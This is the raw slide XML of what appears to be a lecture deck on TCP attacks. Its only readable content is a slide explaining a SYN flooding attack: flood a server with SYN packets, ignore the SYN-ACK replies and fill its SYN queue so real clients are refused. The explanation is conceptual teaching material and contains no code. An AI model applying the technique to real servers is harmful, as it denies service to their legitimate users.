          </p:cNvPr>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3339790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94FD-0EB6-1C80-31EC-EE25D120ACA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D0E409-0210-C943-78DB-F4EC54351A7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85CD33-4565-0C19-9F16-B31338C837B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A90C7EAA-AAFB-4B20-BAA6-29E9F3B07C77}" type="datetimeFigureOut">
              <a:rPr lang="en-CA" smtClean="0"/>
              <a:t>2023-10-04</a:t>
            </a:fld>
            <a:endParaRPr lang="en-CA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A20A3A8-CE2A-1884-8A99-1BC760EB92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6A1E68-DEA6-D62D-A25B-24C27681A108}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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1469077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3182-B127-0216-E033-4A79B507093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DED3223-C2EB-362F-0D50-9B99E2A2D28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C9971C1-3185-6809-030F-AD6FB9D091D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C5501B2-08D3-ACB2-6C63-2A289A84EA20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A90C7EAA-AAFB-4B20-BAA6-29E9F3B07C77}" type="datetimeFigureOut">
              <a:rPr lang="en-CA" smtClean="0"/>
              <a:t>2023-10-04</a:t>
            </a:fld>
            <a:endParaRPr lang="en-CA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{476A844A-B390-5D30-3637-0B583A88DE2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AB50018-0A45-3F03-D8B3-2E8612CC67CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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1135160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DC9-2FB2-9F09-F892-FC09E637EC83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629841" y="273844"/>
            <a:ext cx="7886700" cy="994172"/>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484A749-D462-D04C-C20B-E1731EC39E5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2CE1F-0C41-026E-8CA8-6B9FC8D63AD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0279D38-E692-1430-FF0B-165578BC23F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FA40C0-37CB-4F6E-4964-E5E5400BF37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0E17AA9-63C1-3FE2-E842-0623735BB333}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A90C7EAA-AAFB-4B20-BAA6-29E9F3B07C77}" type="datetimeFigureOut">
              <a:rPr lang="en-CA" smtClean="0"/>
              <a:t>2023-10-04</a:t>
            </a:fld>
            <a:endParaRPr lang="en-CA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E596D93-1EBE-1467-247B-91680ADCC7A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C7FAEBE-DD0B-AA16-0D6D-7469DFA18C36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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7804682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1768-263A-0160-A6F4-A267EC2806C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B52087F-F023-CF00-144E-D2A4B9F5419F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A90C7EAA-AAFB-4B20-BAA6-29E9F3B07C77}" type="datetimeFigureOut">
              <a:rPr lang="en-CA" smtClean="0"/>
              <a:t>2023-10-04</a:t>
            </a:fld>
            <a:endParaRPr lang="en-CA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FAB731D-E12B-320D-5747-49D3E21D7EB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FAFD24F-AF2E-9976-6AB0-943BBDA27659}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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7919025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61A9E-6A29-189B-EA9D-1C6DB7EB60C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A90C7EAA-AAFB-4B20-BAA6-29E9F3B07C77}" type="datetimeFigureOut">
              <a:rPr lang="en-CA" smtClean="0"/>
              <a:t>2023-10-04</a:t>
            </a:fld>
            <a:endParaRPr lang="en-CA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6DEF9E4-2448-7FA8-CA77-0556AF73206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56B0438-BFFE-9EDF-7925-7C05CD77BDAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">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161986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ED82-8A39-820D-A2AD-4E73BF11D8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723B3DE-D18B-A26A-EC1C-7C7AD5D7C18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605A76A-352D-5A08-D4CE-29014D5E860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FB7E508-1E99-38F2-1B55-4ABFEC21E16E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A90C7EAA-AAFB-4B20-BAA6-29E9F3B07C77}" type="datetimeFigureOut">
              <a:rPr lang="en-CA" smtClean="0"/>
              <a:t>2023-10-04</a:t>
            </a:fld>
            <a:endParaRPr lang="en-CA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED933C20-F39A-29FE-C2B6-FCCEF135DA6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AC261C0-5558-E953-7F57-9A570F537B1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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5672020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EA8A-9CE7-B688-326D-C7B8143C98D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123A3F7-5874-9853-09D0-D155562D041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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D656EDB6-24B7-B39A-DCC4-D3B99AB66A2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9C8570A-D8E6-9D21-04A5-FD78A167BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A90C7EAA-AAFB-4B20-BAA6-29E9F3B07C77}" type="datetimeFigureOut">
              <a:rPr lang="en-CA" smtClean="0"/>
              <a:t>2023-10-04</a:t>
            </a:fld>
            <a:endParaRPr lang="en-CA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEDCC26C-B30D-43F3-801F-62DEA7CD4EE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69AF67C-4D5B-E689-ABD1-99B5E3AEBBE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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7425465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E802E1-E1B9-E0E4-04E1-D6C81C1007A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AA6A04D-6A6F-56E4-FA94-4088BE89B7D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BB16264-E693-D89D-82A7-2ADD3CE68B5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90C7EAA-AAFB-4B20-BAA6-29E9F3B07C77}" type="datetimeFigureOut">
              <a:rPr lang="en-CA" smtClean="0"/>
              <a:t>2023-10-04</a:t>
            </a:fld>
            <a:endParaRPr lang="en-CA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1945AC7-60BB-12A9-CD1B-6FCD31629DB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77EB88C-3FE9-7A33-137B-74EECDFC358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847407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wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>TCP  Attacks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9" y="1329599"/>
            <a:ext cx="3237185" cy="2852934"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="159" name="Shape 15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SYN Flooding Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="160" name="Shape 160"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311701" y="1402457"/>
            <a:ext cx="5168120" cy="2551172"/>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Idea : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Send a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> of SYN packets to server; do not answer SYN-ACK packets.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>many TCB records stay in SYN queue long and makes the queue full quickly.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>When a new client sends SYN packet, server will not answer as no space in SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> queue for his TCB record.   </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="7933873" y="2782373"/>
            <a:ext cx="1341997" cy="224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SYN queue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5791828" y="4511633"/>
            <a:ext cx="2249713" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0"/>
              <a:t>Ubuntu default size=128</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Arrow Connector 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7053943" y="3264202"/>
            <a:ext cx="1330251" cy="1401319"/>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4940287" y="4819410"/>
            <a:ext cx="3779261" cy="253320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5920423" y="2894507"/>
            <a:ext cx="1091288" cy="1169551"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Freeform 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6966544" y="2931886"/>
            <a:ext cx="1074997" cy="561254"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 361813 w 1382594"/>
              <a:gd name="connsiteY0" fmla="*/ 33976 h 573406"/>
              <a:gd name="connsiteX1" fmla="*/ 361813 w 1382594"/>
              <a:gd name="connsiteY1" fmla="*/ 33976 h 573406"/>
              <a:gd name="connsiteX2" fmla="*/ 296029 w 1382594"/>
              <a:gd name="connsiteY2" fmla="*/ 40554 h 573406"/>
              <a:gd name="connsiteX3" fmla="*/ 269715 w 1382594"/>
              <a:gd name="connsiteY3" fmla="*/ 53711 h 573406"/>
              <a:gd name="connsiteX4" fmla="*/ 230244 w 1382594"/>
              <a:gd name="connsiteY4" fmla="*/ 66868 h 573406"/>
              <a:gd name="connsiteX5" fmla="*/ 210509 w 1382594"/>
              <a:gd name="connsiteY5" fmla="*/ 80025 h 573406"/>
              <a:gd name="connsiteX6" fmla="*/ 184196 w 1382594"/>
              <a:gd name="connsiteY6" fmla="*/ 86603 h 573406"/>
              <a:gd name="connsiteX7" fmla="*/ 164460 w 1382594"/>
              <a:gd name="connsiteY7" fmla="*/ 93181 h 573406"/>
              <a:gd name="connsiteX8" fmla="*/ 118411 w 1382594"/>
              <a:gd name="connsiteY8" fmla="*/ 119495 h 573406"/>
              <a:gd name="connsiteX9" fmla="*/ 85519 w 1382594"/>
              <a:gd name="connsiteY9" fmla="*/ 145809 h 573406"/>
              <a:gd name="connsiteX10" fmla="*/ 65784 w 1382594"/>
              <a:gd name="connsiteY10" fmla="*/ 165544 h 573406"/>
              <a:gd name="connsiteX11" fmla="*/ 52627 w 1382594"/>
              <a:gd name="connsiteY11" fmla="*/ 185279 h 573406"/>
              <a:gd name="connsiteX12" fmla="*/ 32892 w 1382594"/>
              <a:gd name="connsiteY12" fmla="*/ 191858 h 573406"/>
              <a:gd name="connsiteX13" fmla="*/ 13157 w 1382594"/>
              <a:gd name="connsiteY13" fmla="*/ 244485 h 573406"/>
              <a:gd name="connsiteX14" fmla="*/ 0 w 1382594"/>
              <a:gd name="connsiteY14" fmla="*/ 283956 h 573406"/>
              <a:gd name="connsiteX15" fmla="*/ 6578 w 1382594"/>
              <a:gd name="connsiteY15" fmla="*/ 382632 h 573406"/>
              <a:gd name="connsiteX16" fmla="*/ 46049 w 1382594"/>
              <a:gd name="connsiteY16" fmla="*/ 415524 h 573406"/>
              <a:gd name="connsiteX17" fmla="*/ 65784 w 1382594"/>
              <a:gd name="connsiteY17" fmla="*/ 428681 h 573406"/>
              <a:gd name="connsiteX18" fmla="*/ 111833 w 1382594"/>
              <a:gd name="connsiteY18" fmla="*/ 441838 h 573406"/>
              <a:gd name="connsiteX19" fmla="*/ 138147 w 1382594"/>
              <a:gd name="connsiteY19" fmla="*/ 454994 h 573406"/>
              <a:gd name="connsiteX20" fmla="*/ 190774 w 1382594"/>
              <a:gd name="connsiteY20" fmla="*/ 474730 h 573406"/>
              <a:gd name="connsiteX21" fmla="*/ 223666 w 1382594"/>
              <a:gd name="connsiteY21" fmla="*/ 507622 h 573406"/>
              <a:gd name="connsiteX22" fmla="*/ 256558 w 1382594"/>
              <a:gd name="connsiteY22" fmla="*/ 540514 h 573406"/>
              <a:gd name="connsiteX23" fmla="*/ 302607 w 1382594"/>
              <a:gd name="connsiteY23" fmla="*/ 553671 h 573406"/>
              <a:gd name="connsiteX24" fmla="*/ 394705 w 1382594"/>
              <a:gd name="connsiteY24" fmla="*/ 566827 h 573406"/>
              <a:gd name="connsiteX25" fmla="*/ 434175 w 1382594"/>
              <a:gd name="connsiteY25" fmla="*/ 573406 h 573406"/>
              <a:gd name="connsiteX26" fmla="*/ 546009 w 1382594"/>
              <a:gd name="connsiteY26" fmla="*/ 566827 h 573406"/>
              <a:gd name="connsiteX27" fmla="*/ 565744 w 1382594"/>
              <a:gd name="connsiteY27" fmla="*/ 560249 h 573406"/>
              <a:gd name="connsiteX28" fmla="*/ 618371 w 1382594"/>
              <a:gd name="connsiteY28" fmla="*/ 527357 h 573406"/>
              <a:gd name="connsiteX29" fmla="*/ 670998 w 1382594"/>
              <a:gd name="connsiteY29" fmla="*/ 507622 h 573406"/>
              <a:gd name="connsiteX30" fmla="*/ 690734 w 1382594"/>
              <a:gd name="connsiteY30" fmla="*/ 494465 h 573406"/>
              <a:gd name="connsiteX31" fmla="*/ 710469 w 1382594"/>
              <a:gd name="connsiteY31" fmla="*/ 487886 h 573406"/>
              <a:gd name="connsiteX32" fmla="*/ 743361 w 1382594"/>
              <a:gd name="connsiteY32" fmla="*/ 448416 h 573406"/>
              <a:gd name="connsiteX33" fmla="*/ 776253 w 1382594"/>
              <a:gd name="connsiteY33" fmla="*/ 435259 h 573406"/>
              <a:gd name="connsiteX34" fmla="*/ 828880 w 1382594"/>
              <a:gd name="connsiteY34" fmla="*/ 408945 h 573406"/>
              <a:gd name="connsiteX35" fmla="*/ 868351 w 1382594"/>
              <a:gd name="connsiteY35" fmla="*/ 395789 h 573406"/>
              <a:gd name="connsiteX36" fmla="*/ 901243 w 1382594"/>
              <a:gd name="connsiteY36" fmla="*/ 382632 h 573406"/>
              <a:gd name="connsiteX37" fmla="*/ 920978 w 1382594"/>
              <a:gd name="connsiteY37" fmla="*/ 376053 h 573406"/>
              <a:gd name="connsiteX38" fmla="*/ 960449 w 1382594"/>
              <a:gd name="connsiteY38" fmla="*/ 349740 h 573406"/>
              <a:gd name="connsiteX39" fmla="*/ 993341 w 1382594"/>
              <a:gd name="connsiteY39" fmla="*/ 330004 h 573406"/>
              <a:gd name="connsiteX40" fmla="*/ 1013076 w 1382594"/>
              <a:gd name="connsiteY40" fmla="*/ 316848 h 573406"/>
              <a:gd name="connsiteX41" fmla="*/ 1032811 w 1382594"/>
              <a:gd name="connsiteY41" fmla="*/ 310269 h 573406"/>
              <a:gd name="connsiteX42" fmla="*/ 1059125 w 1382594"/>
              <a:gd name="connsiteY42" fmla="*/ 297112 h 573406"/>
              <a:gd name="connsiteX43" fmla="*/ 1098596 w 1382594"/>
              <a:gd name="connsiteY43" fmla="*/ 283956 h 573406"/>
              <a:gd name="connsiteX44" fmla="*/ 1124909 w 1382594"/>
              <a:gd name="connsiteY44" fmla="*/ 264220 h 573406"/>
              <a:gd name="connsiteX45" fmla="*/ 1144644 w 1382594"/>
              <a:gd name="connsiteY45" fmla="*/ 257642 h 573406"/>
              <a:gd name="connsiteX46" fmla="*/ 1164380 w 1382594"/>
              <a:gd name="connsiteY46" fmla="*/ 237907 h 573406"/>
              <a:gd name="connsiteX47" fmla="*/ 1210429 w 1382594"/>
              <a:gd name="connsiteY47" fmla="*/ 218171 h 573406"/>
              <a:gd name="connsiteX48" fmla="*/ 1236742 w 1382594"/>
              <a:gd name="connsiteY48" fmla="*/ 205015 h 573406"/>
              <a:gd name="connsiteX49" fmla="*/ 1256478 w 1382594"/>
              <a:gd name="connsiteY49" fmla="*/ 191858 h 573406"/>
              <a:gd name="connsiteX50" fmla="*/ 1335419 w 1382594"/>
              <a:gd name="connsiteY50" fmla="*/ 172122 h 573406"/>
              <a:gd name="connsiteX51" fmla="*/ 1374889 w 1382594"/>
              <a:gd name="connsiteY51" fmla="*/ 152387 h 573406"/>
              <a:gd name="connsiteX52" fmla="*/ 1381468 w 1382594"/>
              <a:gd name="connsiteY52" fmla="*/ 132652 h 573406"/>
              <a:gd name="connsiteX53" fmla="*/ 1355154 w 1382594"/>
              <a:gd name="connsiteY53" fmla="*/ 126074 h 573406"/>
              <a:gd name="connsiteX54" fmla="*/ 1295948 w 1382594"/>
              <a:gd name="connsiteY54" fmla="*/ 106338 h 573406"/>
              <a:gd name="connsiteX55" fmla="*/ 1236742 w 1382594"/>
              <a:gd name="connsiteY55" fmla="*/ 93181 h 573406"/>
              <a:gd name="connsiteX56" fmla="*/ 809145 w 1382594"/>
              <a:gd name="connsiteY56" fmla="*/ 86603 h 573406"/>
              <a:gd name="connsiteX57" fmla="*/ 565744 w 1382594"/>
              <a:gd name="connsiteY57" fmla="*/ 66868 h 573406"/>
              <a:gd name="connsiteX58" fmla="*/ 546009 w 1382594"/>
              <a:gd name="connsiteY58" fmla="*/ 60289 h 573406"/>
              <a:gd name="connsiteX59" fmla="*/ 513116 w 1382594"/>
              <a:gd name="connsiteY59" fmla="*/ 53711 h 573406"/>
              <a:gd name="connsiteX60" fmla="*/ 473646 w 1382594"/>
              <a:gd name="connsiteY60" fmla="*/ 40554 h 573406"/>
              <a:gd name="connsiteX61" fmla="*/ 401283 w 1382594"/>
              <a:gd name="connsiteY61" fmla="*/ 20819 h 573406"/>
              <a:gd name="connsiteX62" fmla="*/ 381548 w 1382594"/>
              <a:gd name="connsiteY62" fmla="*/ 1084 h 573406"/>
              <a:gd name="connsiteX63" fmla="*/ 361813 w 1382594"/>
              <a:gd name="connsiteY63" fmla="*/ 33976 h 57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82594" h="573406">
                <a:moveTo>
                  <a:pt x="361813" y="33976"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="361813" y="33976"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="339885" y="36169"/>
                  <a:pt x="317577" y="35937"/>
                  <a:pt x="296029" y="40554"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="286440" y="42609"/>
                  <a:pt x="278820" y="50069"/>
                  <a:pt x="269715" y="53711"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="256838" y="58862"/>
                  <a:pt x="241783" y="59175"/>
                  <a:pt x="230244" y="66868"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="223666" y="71254"/>
                  <a:pt x="217776" y="76911"/>
                  <a:pt x="210509" y="80025"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="202199" y="83586"/>
                  <a:pt x="192889" y="84119"/>
                  <a:pt x="184196" y="86603"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="177528" y="88508"/>
                  <a:pt x="170834" y="90449"/>
                  <a:pt x="164460" y="93181"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="141095" y="103195"/>
                  <a:pt x="138228" y="106284"/>
                  <a:pt x="118411" y="119495"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="88990" y="163629"/>
                  <a:pt x="123648" y="120389"/>
                  <a:pt x="85519" y="145809"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="77778" y="150969"/>
                  <a:pt x="71740" y="158397"/>
                  <a:pt x="65784" y="165544"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="60723" y="171618"/>
                  <a:pt x="58801" y="180340"/>
                  <a:pt x="52627" y="185279"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="47212" y="189611"/>
                  <a:pt x="39470" y="189665"/>
                  <a:pt x="32892" y="191858"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9995" y="226202"/>
                  <a:pt x="26288" y="196336"/>
                  <a:pt x="13157" y="244485"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9508" y="257865"/>
                  <a:pt x="0" y="283956"/>
                  <a:pt x="0" y="283956"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2193" y="316848"/>
                  <a:pt x="1159" y="350116"/>
                  <a:pt x="6578" y="382632"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10113" y="403842"/>
                  <a:pt x="31346" y="407122"/>
                  <a:pt x="46049" y="415524"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="52914" y="419447"/>
                  <a:pt x="58712" y="425145"/>
                  <a:pt x="65784" y="428681"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="81678" y="436628"/>
                  <a:pt x="94984" y="435520"/>
                  <a:pt x="111833" y="441838"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="121015" y="445281"/>
                  <a:pt x="129186" y="451011"/>
                  <a:pt x="138147" y="454994"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="161745" y="465482"/>
                  <a:pt x="169075" y="467496"/>
